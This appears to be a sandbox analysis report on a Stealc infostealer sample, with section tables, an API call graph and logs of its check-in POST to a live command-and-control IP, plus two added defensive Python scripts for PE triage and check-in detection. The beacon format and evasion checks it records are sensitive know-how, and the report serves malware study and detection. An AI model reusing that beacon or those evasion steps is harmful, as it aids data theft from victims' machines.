                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [eax+00000000h], eax
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or ecx, dword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        pop ds
                        add byte ptr [eax+000000FEh], ah
                        add byte ptr [edx], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Data directories (Name | Virtual Address | Virtual Size | In Section):
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics):
(no printable name) | 0x1000 | 0x25b000 | 0x22800 | d7c5746680ebc6e8fbd1bef8f5f9bb95 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no printable name) | 0x25e000 | 0x2a3000 | 0x200 | 35ff166fe23df5ddb0dc542c06bd0f99 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
siqapmbg | 0x501000 | 0x19f000 | 0x19ec00 | d5a8b7ff243d17d23958dce2d5ade46e | False | 0.9949494235985533 | data | 7.954494499000927 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dgzgzabs | 0x6a0000 | 0x1000 | 0x400 | 312892bae1786b27925d541960b3daed | False | 0.7216796875 | data | 5.789932407526162 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6a1000 | 0x3000 | 0x2200 | 74684cbc685068efcdbc1b6219df5bff | False | 0.058823529411764705 | DOS executable (COM) | 0.7316307732517449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports (DLL | Import):
kernel32.dll | lstrcpy
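The section table, entry point and single import above are the static indicators behind the report's "Entry point lies outside standard sections", "PE file contains section with special chars", "Detected unpacking (changes PE section rights)" and "Extensive use of GetProcAddress" signatures. The following triage script is an added example, not code from the report or from Joe Sandbox: it reproduces those checks over the values transcribed from the tables above (in practice the records would come from pefile), and the finding codes, the 7.0 entropy threshold, the 0x1000 section alignment and the "three or fewer imports" cut-off are assumptions of this example.

```python
"""Static triage of a PE section table (added example; values transcribed from the report)."""
import math
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_ALIGNMENT = 0x1000          # assumed; read it from the optional header in real use
# Names a linker normally emits; anything else deserves a look.
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT", ".gfids"}


@dataclass(frozen=True)
class Section:
    name: str
    va: int
    vsize: int
    raw_size: int
    characteristics: int
    entropy: Optional[float]        # None where the report printed "unknown"


RWX_DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW_DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Transcribed from the report: image base, entry point, import list, section table.
IMAGE_BASE = 0x400000
ENTRY_POINT = 0xAA1000
IMPORTS: Dict[str, List[str]] = {"kernel32.dll": ["lstrcpy"]}
SECTIONS = [
    Section("", 0x1000, 0x25B000, 0x22800, RWX_DATA, None),
    Section(".rsrc", 0x25C000, 0x1000, 0x0, RW_DATA, 0.0),
    Section(".idata", 0x25D000, 0x1000, 0x200, RW_DATA, 0.906),
    Section("", 0x25E000, 0x2A3000, 0x200, RWX_DATA, None),
    Section("siqapmbg", 0x501000, 0x19F000, 0x19EC00, RWX_DATA, 7.954),
    Section("dgzgzabs", 0x6A0000, 0x1000, 0x400, RWX_DATA, 5.790),
    Section(".taggant", 0x6A1000, 0x3000, 0x2200, RWX_DATA, 0.732),
]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, from 0.0 (constant) to 8.0 (uniform); packed or encrypted data sits near 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def align_up(value: int, alignment: int) -> int:
    return (value + alignment - 1) // alignment * alignment


def label(section: Section) -> str:
    return section.name or f"<unnamed@{section.va:#x}>"


def section_for_rva(rva: int, sections: List[Section]) -> Optional[Section]:
    """Section whose virtual range contains the RVA, or None if it maps nowhere."""
    for s in sections:
        if s.va <= rva < s.va + max(s.vsize, s.raw_size):
            return s
    return None


def triage(sections: List[Section], image_base: int, entry_point: int,
           imports: Dict[str, List[str]], entropy_threshold: float = 7.0) -> List[Tuple[str, str]]:
    """Return (finding code, subject) pairs mirroring the report's static signatures."""
    findings: List[Tuple[str, str]] = []
    ep = section_for_rva(entry_point - image_base, sections)
    if ep is None:
        findings.append(("EP_OUTSIDE_SECTIONS", f"{entry_point:#x}"))
    elif ep.name not in STANDARD_SECTIONS:
        findings.append(("EP_NONSTD_SECTION", label(ep)))
    for s in sections:
        name = label(s)
        if not s.name or not s.name.isprintable():
            findings.append(("NAME_UNPRINTABLE", name))
        elif s.name not in STANDARD_SECTIONS:
            findings.append(("NAME_NONSTD", name))
        if s.characteristics & IMAGE_SCN_MEM_EXECUTE and s.characteristics & IMAGE_SCN_MEM_WRITE:
            findings.append(("RWX", name))            # writable code: self-modifying / unpacking target
        if s.vsize > align_up(s.raw_size, SECTION_ALIGNMENT):
            findings.append(("VSIZE_GT_RAW", name))   # virtual room reserved for code unpacked at runtime
        if s.entropy is not None and s.raw_size and s.entropy >= entropy_threshold:
            findings.append(("HIGH_ENTROPY", name))
    total_imports = sum(len(v) for v in imports.values())
    if total_imports <= 3:
        findings.append(("FEW_IMPORTS", str(total_imports)))  # the rest is resolved via GetProcAddress
    return findings


if __name__ == "__main__":
    for code, subject in triage(SECTIONS, IMAGE_BASE, ENTRY_POINT, IMPORTS):
        print(f"{code:20s} {subject}")
```

On this sample the script reports the entry point in .taggant, two sections without a printable name, five RWX sections, three sections whose virtual size exceeds their file-backed size (the two unnamed ones and the empty .rsrc) and a single import, which together describe a packed loader that unpacks into reserved RWX space and resolves its real imports at run time.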
IDS alerts (Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol):
2024-10-14T01:00:20.306858+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49717 | 185.215.113.37 | 80 | TCP
TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP):
Oct 14, 2024 01:00:19.341166973 CEST | 49717 | 80 | 192.168.2.6 | 185.215.113.37
Oct 14, 2024 01:00:19.346110106 CEST | 80 | 49717 | 185.215.113.37 | 192.168.2.6
Oct 14, 2024 01:00:19.346203089 CEST | 49717 | 80 | 192.168.2.6 | 185.215.113.37
Oct 14, 2024 01:00:19.346755981 CEST | 49717 | 80 | 192.168.2.6 | 185.215.113.37
Oct 14, 2024 01:00:19.351608038 CEST | 80 | 49717 | 185.215.113.37 | 192.168.2.6
Oct 14, 2024 01:00:20.069622993 CEST | 80 | 49717 | 185.215.113.37 | 192.168.2.6
Oct 14, 2024 01:00:20.069686890 CEST | 49717 | 80 | 192.168.2.6 | 185.215.113.37
Oct 14, 2024 01:00:20.074434996 CEST | 49717 | 80 | 192.168.2.6 | 185.215.113.37
Oct 14, 2024 01:00:20.079226971 CEST | 80 | 49717 | 185.215.113.37 | 192.168.2.6
Oct 14, 2024 01:00:20.306560993 CEST | 80 | 49717 | 185.215.113.37 | 192.168.2.6
Oct 14, 2024 01:00:20.306858063 CEST | 49717 | 80 | 192.168.2.6 | 185.215.113.37
Oct 14, 2024 01:00:22.687580109 CEST | 49717 | 80 | 192.168.2.6 | 185.215.113.37
                        • 185.215.113.37
HTTP sessions (Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process):
0 | 192.168.2.6 | 49717 | 185.215.113.37 | 80 | 5176 | C:\Users\user\Desktop\file.exe
HTTP data (Timestamp | Bytes transferred | Direction | Data):
Oct 14, 2024 01:00:19.346755981 CEST | 89 | OUT | GET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
Oct 14, 2024 01:00:20.069622993 CEST | 203 | IN | HTTP/1.1 200 OK
                        Date: Sun, 13 Oct 2024 23:00:19 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
Oct 14, 2024 01:00:20.074434996 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDH
                        Host: 185.215.113.37
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 41 43 46 46 33 39 42 42 33 35 38 33 34 31 39 37 30 35 32 34 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 2d 2d 0d 0a
                        Data Ascii: ------JKECGHCFIJDAAKFHJJDHContent-Disposition: form-data; name="hwid"4ACFF39BB3583419705248------JKECGHCFIJDAAKFHJJDHContent-Disposition: form-data; name="build"doma------JKECGHCFIJDAAKFHJJDH--
Oct 14, 2024 01:00:20.306560993 CEST | 210 | IN | HTTP/1.1 200 OK
                        Date: Sun, 13 Oct 2024 23:00:20 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 of the ASCII string "block")
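The exchange above is the whole of the sample's network activity: a GET / probe, then a multipart POST to /e2b1563c6670f193.php carrying an "hwid" and a "build" field, answered with an 8-byte base64 body that decodes to "block", after which the capture shows no further requests. The following script is an added example, not code from the report, from Joe Sandbox or from the sample: it parses that POST body and reply exactly as captured and applies a classifier built only from the traits visible here (POST, multipart/form-data, a path of 16 hex digits plus ".php", fields named hwid and build). That heuristic is an assumption of this example and is not the logic of the Emerging Threats rule (SID 2044243) that fired; the benign upload request is constructed for contrast.

```python
"""Parse and classify the Stealc-style HTTP check-in captured above (added example)."""
import base64
import re
from typing import Dict, Tuple

# Transcribed from the captured POST (Content-Length: 211).
CAPTURED_REQUEST_LINE = "POST /e2b1563c6670f193.php HTTP/1.1"
CAPTURED_HEADERS = {
    "Content-Type": "multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDH",
    "Host": "185.215.113.37",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}
CAPTURED_BODY = (
    b"------JKECGHCFIJDAAKFHJJDH\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"4ACFF39BB3583419705248\r\n"
    b"------JKECGHCFIJDAAKFHJJDH\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------JKECGHCFIJDAAKFHJJDH--\r\n"
)
# Body of the server's second 200 OK (Content-Length: 8).
CAPTURED_REPLY = b"YmxvY2s="

# Constructed benign upload with the same framing, so the classifier has something to reject.
BENIGN_REQUEST_LINE = "POST /upload HTTP/1.1"
BENIGN_HEADERS = {"Content-Type": "multipart/form-data; boundary=abc123"}
BENIGN_BODY = (
    b"--abc123\r\n"
    b'Content-Disposition: form-data; name="file"; filename="a.txt"\r\n'
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"hello\r\n"
    b"--abc123--\r\n"
)

_C2_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")       # assumption drawn from this capture
_BOUNDARY = re.compile(r'boundary="?([^";]+)"?')
_FIELD_NAME = re.compile(rb'\bname="([^"]*)"')


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Return {field name: raw value} from a multipart/form-data body.

    RFC 2046 framing: each part begins with CRLF "--" boundary, the CRLF that
    precedes a delimiter belongs to the delimiter, and "--" boundary "--" closes
    the body. Values are returned as bytes because form parts may be binary.
    """
    delimiter = b"--" + boundary.encode("ascii")
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):            # closing delimiter
            break
        if part.startswith(b"\r\n"):
            part = part[2:]
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue                          # malformed part: no header/body separator
        if value.endswith(b"\r\n"):
            value = value[:-2]
        match = _FIELD_NAME.search(head)
        if match:
            fields[match.group(1).decode("ascii", "replace")] = value
    return fields


def classify_checkin(request_line: str, headers: Dict[str, str],
                     body: bytes) -> Tuple[bool, Dict[str, bytes]]:
    """Return (looks like this check-in, parsed form fields)."""
    try:
        method, path, _version = request_line.split(" ", 2)
    except ValueError:
        return False, {}
    ctype = headers.get("Content-Type", "")
    if method != "POST" or not ctype.lower().startswith("multipart/form-data"):
        return False, {}
    bmatch = _BOUNDARY.search(ctype)
    if not bmatch:
        return False, {}
    fields = parse_multipart(body, bmatch.group(1))
    suspect = bool(_C2_PATH.match(path)) and {"hwid", "build"} <= set(fields)
    return suspect, fields


def decode_reply(reply: bytes) -> str:
    """Decode the base64 reply body; the captured one is the word "block"."""
    return base64.b64decode(reply, validate=True).decode("ascii", "replace")


if __name__ == "__main__":
    suspect, fields = classify_checkin(CAPTURED_REQUEST_LINE, CAPTURED_HEADERS, CAPTURED_BODY)
    print("check-in:", suspect, fields)
    print("reply:", decode_reply(CAPTURED_REPLY))
```

The parser is deliberately strict about the closing delimiter and the CRLF ownership, because a detector that splits on the boundary string alone would also swallow a boundary that happens to appear inside a binary part. A reply of "block" instead of a configuration matches the rest of this report: no further requests, no dropped files and no created registry values.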



                        Target ID:0
                        Start time:19:00:14
                        Start date:13/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0xde0000
                        File size:1'854'976 bytes
                        MD5 hash:10F4BEB1C5F54BB1D754F56785E14563
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2214050807.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2254739103.0000000000838000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true


                          Execution Graph

                          Execution Coverage:8.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:10.1%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:24
The graph itself is an interactive node/edge dump (node id, address, API names) that does not render in text. The API chains that are legible in the dump:
- df9860: reads the PEB (df9750), then LoadLibraryA (5 calls) and GetProcAddress (21 calls in one block, 7 more afterwards): the real import table is resolved at run time.
- de11d0 -> de1160 GetSystemInfo -> de1110 GetCurrentProcess, VirtualAllocExNuma -> de10a0 VirtualAlloc -> df89b0 (__aulldiv): each step has its own ExitProcess branch, i.e. environment checks that terminate the sample when they fail.
- df6770 GetUserDefaultLangID: five separate ExitProcess branches (df67a3, df67ad, df67b7, df67c1, df67cb) before control reaches de1190; a language-ID gate.
- de1190 -> df78e0 (GetProcessHeap, RtlAllocateHeap, GetComputerNameA) -> df7850 (GetProcessHeap, RtlAllocateHeap, GetUserNameA), with an ExitProcess branch (de11c4) after the name checks.
- df6a30 -> df78e0 GetComputerNameA -> five passes through dfa9b0 (lstrlen, lstrcpy, lstrcat) -> dfa8a0 lstrcpy -> df6ac2 OpenEventA: if the event already exists, CloseHandle and Sleep and retry; otherwise CreateEventA (df6ae1) and continue; a single-instance gate built from a named event.
- df6b0c -> df6920 GetSystemTime -> df6820 -> sscanf -> SystemTimeToFileTime (twice) -> ExitProcess (df69d8) or fall through to df5b10: a date parsed from a string is compared with the current time, an expiry check.
- df5b10 onward: string building through lstrcpy/lstrlen/lstrcat wrappers (dfa740, dfa820, df6430, dfa9b0, dfa8a0), GetWindowsDirectoryA (df7500), de1590 lstrcpy and de5960 (34 API calls), repeated for df1050, df0d90, df0f40 and further nodes; the dump is truncated at this point in the report.
de1590 lstrcpy 13684->13685 13686 df5eb5 13685->13686 14913 df1a10 13686->14913 13688 df5eba 13689 dfa740 lstrcpy 13688->13689 13690 df5ed6 13689->13690 15257 de4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13690->15257 13692 df5edb 13693 de1590 lstrcpy 13692->13693 13694 df5f5b 13693->13694 15264 df0740 13694->15264 13696 df5f60 13697 dfa740 lstrcpy 13696->13697 13698 df5f86 13697->13698 13699 de1590 lstrcpy 13698->13699 13700 df5f9a 13699->13700 13701 de5960 34 API calls 13700->13701 13702 df5fa0 13701->13702 13796 de45d1 RtlAllocateHeap 13795->13796 13799 de4621 VirtualProtect 13796->13799 13799->13444 13800->13531 13802 de10c2 codecvt 13801->13802 13803 de10fd 13802->13803 13804 de10e2 VirtualFree 13802->13804 13803->13561 13804->13803 13806 de1233 GlobalMemoryStatusEx 13805->13806 13806->13564 13807->13588 13809 dfa7c2 13808->13809 13810 dfa7ec 13809->13810 13811 dfa7da lstrcpy 13809->13811 13810->13593 13811->13810 13813 dfa740 lstrcpy 13812->13813 13814 df6833 13813->13814 13815 dfa9b0 4 API calls 13814->13815 13816 df6845 13815->13816 13817 dfa8a0 lstrcpy 13816->13817 13818 df684e 13817->13818 13819 dfa9b0 4 API calls 13818->13819 13820 df6867 13819->13820 13821 dfa8a0 lstrcpy 13820->13821 13822 df6870 13821->13822 13823 dfa9b0 4 API calls 13822->13823 13824 df688a 13823->13824 13825 dfa8a0 lstrcpy 13824->13825 13826 df6893 13825->13826 13827 dfa9b0 4 API calls 13826->13827 13828 df68ac 13827->13828 13829 dfa8a0 lstrcpy 13828->13829 13830 df68b5 13829->13830 13831 dfa9b0 4 API calls 13830->13831 13832 df68cf 13831->13832 13833 dfa8a0 lstrcpy 13832->13833 13834 df68d8 13833->13834 13835 dfa9b0 4 API calls 13834->13835 13836 df68f3 13835->13836 13837 dfa8a0 lstrcpy 13836->13837 13838 df68fc 13837->13838 13839 dfa7a0 lstrcpy 13838->13839 13840 df6910 13839->13840 13840->13600 13842 dfa812 13841->13842 13842->13603 13844 dfa83f 13843->13844 13845 df5b54 13844->13845 13846 dfa87b lstrcpy 13844->13846 13845->13613 13846->13845 13848 dfa8a0 lstrcpy 
13847->13848 13849 df6443 13848->13849 13850 dfa8a0 lstrcpy 13849->13850 13851 df6455 13850->13851 13852 dfa8a0 lstrcpy 13851->13852 13853 df6467 13852->13853 13854 dfa8a0 lstrcpy 13853->13854 13855 df5b86 13854->13855 13855->13619 13857 de45c0 2 API calls 13856->13857 13858 de26b4 13857->13858 13859 de45c0 2 API calls 13858->13859 13860 de26d7 13859->13860 13861 de45c0 2 API calls 13860->13861 13862 de26f0 13861->13862 13863 de45c0 2 API calls 13862->13863 13864 de2709 13863->13864 13865 de45c0 2 API calls 13864->13865 13866 de2736 13865->13866 13867 de45c0 2 API calls 13866->13867 13868 de274f 13867->13868 13869 de45c0 2 API calls 13868->13869 13870 de2768 13869->13870 13871 de45c0 2 API calls 13870->13871 13872 de2795 13871->13872 13873 de45c0 2 API calls 13872->13873 13874 de27ae 13873->13874 13875 de45c0 2 API calls 13874->13875 13876 de27c7 13875->13876 13877 de45c0 2 API calls 13876->13877 13878 de27e0 13877->13878 13879 de45c0 2 API calls 13878->13879 13880 de27f9 13879->13880 13881 de45c0 2 API calls 13880->13881 13882 de2812 13881->13882 13883 de45c0 2 API calls 13882->13883 13884 de282b 13883->13884 13885 de45c0 2 API calls 13884->13885 13886 de2844 13885->13886 13887 de45c0 2 API calls 13886->13887 13888 de285d 13887->13888 13889 de45c0 2 API calls 13888->13889 13890 de2876 13889->13890 13891 de45c0 2 API calls 13890->13891 13892 de288f 13891->13892 13893 de45c0 2 API calls 13892->13893 13894 de28a8 13893->13894 13895 de45c0 2 API calls 13894->13895 13896 de28c1 13895->13896 13897 de45c0 2 API calls 13896->13897 13898 de28da 13897->13898 13899 de45c0 2 API calls 13898->13899 13900 de28f3 13899->13900 13901 de45c0 2 API calls 13900->13901 13902 de290c 13901->13902 13903 de45c0 2 API calls 13902->13903 13904 de2925 13903->13904 13905 de45c0 2 API calls 13904->13905 13906 de293e 13905->13906 13907 de45c0 2 API calls 13906->13907 13908 de2957 13907->13908 13909 de45c0 2 API calls 13908->13909 13910 de2970 13909->13910 13911 de45c0 2 API calls 13910->13911 
13912 de2989 13911->13912 13913 de45c0 2 API calls 13912->13913 13914 de29a2 13913->13914 13915 de45c0 2 API calls 13914->13915 13916 de29bb 13915->13916 13917 de45c0 2 API calls 13916->13917 13918 de29d4 13917->13918 13919 de45c0 2 API calls 13918->13919 13920 de29ed 13919->13920 13921 de45c0 2 API calls 13920->13921 13922 de2a06 13921->13922 13923 de45c0 2 API calls 13922->13923 13924 de2a1f 13923->13924 13925 de45c0 2 API calls 13924->13925 13926 de2a38 13925->13926 13927 de45c0 2 API calls 13926->13927 13928 de2a51 13927->13928 13929 de45c0 2 API calls 13928->13929 13930 de2a6a 13929->13930 13931 de45c0 2 API calls 13930->13931 13932 de2a83 13931->13932 13933 de45c0 2 API calls 13932->13933 13934 de2a9c 13933->13934 13935 de45c0 2 API calls 13934->13935 13936 de2ab5 13935->13936 13937 de45c0 2 API calls 13936->13937 13938 de2ace 13937->13938 13939 de45c0 2 API calls 13938->13939 13940 de2ae7 13939->13940 13941 de45c0 2 API calls 13940->13941 13942 de2b00 13941->13942 13943 de45c0 2 API calls 13942->13943 13944 de2b19 13943->13944 13945 de45c0 2 API calls 13944->13945 13946 de2b32 13945->13946 13947 de45c0 2 API calls 13946->13947 13948 de2b4b 13947->13948 13949 de45c0 2 API calls 13948->13949 13950 de2b64 13949->13950 13951 de45c0 2 API calls 13950->13951 13952 de2b7d 13951->13952 13953 de45c0 2 API calls 13952->13953 13954 de2b96 13953->13954 13955 de45c0 2 API calls 13954->13955 13956 de2baf 13955->13956 13957 de45c0 2 API calls 13956->13957 13958 de2bc8 13957->13958 13959 de45c0 2 API calls 13958->13959 13960 de2be1 13959->13960 13961 de45c0 2 API calls 13960->13961 13962 de2bfa 13961->13962 13963 de45c0 2 API calls 13962->13963 13964 de2c13 13963->13964 13965 de45c0 2 API calls 13964->13965 13966 de2c2c 13965->13966 13967 de45c0 2 API calls 13966->13967 13968 de2c45 13967->13968 13969 de45c0 2 API calls 13968->13969 13970 de2c5e 13969->13970 13971 de45c0 2 API calls 13970->13971 13972 de2c77 13971->13972 13973 de45c0 2 API calls 13972->13973 13974 de2c90 
13973->13974 13975 de45c0 2 API calls 13974->13975 13976 de2ca9 13975->13976 13977 de45c0 2 API calls 13976->13977 13978 de2cc2 13977->13978 13979 de45c0 2 API calls 13978->13979 13980 de2cdb 13979->13980 13981 de45c0 2 API calls 13980->13981 13982 de2cf4 13981->13982 13983 de45c0 2 API calls 13982->13983 13984 de2d0d 13983->13984 13985 de45c0 2 API calls 13984->13985 13986 de2d26 13985->13986 13987 de45c0 2 API calls 13986->13987 13988 de2d3f 13987->13988 13989 de45c0 2 API calls 13988->13989 13990 de2d58 13989->13990 13991 de45c0 2 API calls 13990->13991 13992 de2d71 13991->13992 13993 de45c0 2 API calls 13992->13993 13994 de2d8a 13993->13994 13995 de45c0 2 API calls 13994->13995 13996 de2da3 13995->13996 13997 de45c0 2 API calls 13996->13997 13998 de2dbc 13997->13998 13999 de45c0 2 API calls 13998->13999 14000 de2dd5 13999->14000 14001 de45c0 2 API calls 14000->14001 14002 de2dee 14001->14002 14003 de45c0 2 API calls 14002->14003 14004 de2e07 14003->14004 14005 de45c0 2 API calls 14004->14005 14006 de2e20 14005->14006 14007 de45c0 2 API calls 14006->14007 14008 de2e39 14007->14008 14009 de45c0 2 API calls 14008->14009 14010 de2e52 14009->14010 14011 de45c0 2 API calls 14010->14011 14012 de2e6b 14011->14012 14013 de45c0 2 API calls 14012->14013 14014 de2e84 14013->14014 14015 de45c0 2 API calls 14014->14015 14016 de2e9d 14015->14016 14017 de45c0 2 API calls 14016->14017 14018 de2eb6 14017->14018 14019 de45c0 2 API calls 14018->14019 14020 de2ecf 14019->14020 14021 de45c0 2 API calls 14020->14021 14022 de2ee8 14021->14022 14023 de45c0 2 API calls 14022->14023 14024 de2f01 14023->14024 14025 de45c0 2 API calls 14024->14025 14026 de2f1a 14025->14026 14027 de45c0 2 API calls 14026->14027 14028 de2f33 14027->14028 14029 de45c0 2 API calls 14028->14029 14030 de2f4c 14029->14030 14031 de45c0 2 API calls 14030->14031 14032 de2f65 14031->14032 14033 de45c0 2 API calls 14032->14033 14034 de2f7e 14033->14034 14035 de45c0 2 API calls 14034->14035 14036 de2f97 14035->14036 
